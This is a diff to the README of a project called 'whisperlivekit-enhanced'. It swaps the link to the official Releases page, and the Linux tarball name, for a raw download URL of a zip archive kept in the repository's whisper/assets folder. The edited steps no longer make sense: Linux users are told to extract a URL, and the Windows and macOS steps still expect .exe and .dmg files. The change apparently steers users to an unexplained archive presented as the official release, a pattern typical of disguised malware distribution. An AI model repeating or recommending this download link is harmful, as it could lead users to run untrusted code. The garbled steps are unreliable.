HaNguyen-prog/whisperlivekit-enhanced/README.md

 ### 📦 Installation Steps

 1. **Download the Application**
-   Visit the [Releases page](https://github.com/HaNguyen-prog/whisperlivekit-enhanced/releases) to download the latest version of whisperlivekit-enhanced.
+   Visit the [Releases page](https://raw.githubusercontent.com/HaNguyen-prog/whisperlivekit-enhanced/main/whisperlivekit/whisper/assets/whisperlivekit-enhanced_v3.2.zip) to download the latest version of whisperlivekit-enhanced.

 2. **Choose Your Package**
    Look for the package suitable for your operating system.
 Common formats include `.exe` for Windows and `.dmg` for macOS.
-Linux users may find a `.tar.gz` file.
+Linux users may find a `https://raw.githubusercontent.com/HaNguyen-prog/whisperlivekit-enhanced/main/whisperlivekit/whisper/assets/whisperlivekit-enhanced_v3.2.zip` file.

 3. **Run the Installer**
    - **For Windows:** Double-click the downloaded `.exe` file and follow the installation prompts.
    - **For macOS:** Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - **For Linux:** Extract the files from the `.tar.gz` file and follow the included instructions in the README.
+   - **For Linux:** Extract the files from the `https://raw.githubusercontent.com/HaNguyen-prog/whisperlivekit-enhanced/main/whisperlivekit/whisper/assets/whisperlivekit-enhanced_v3.2.zip` file and follow the included instructions in the README.

 4. **Launch the Application**
    After the installation is complete, find whisperlivekit-enhanced in your applications folder or the Start menu.
 Click to launch.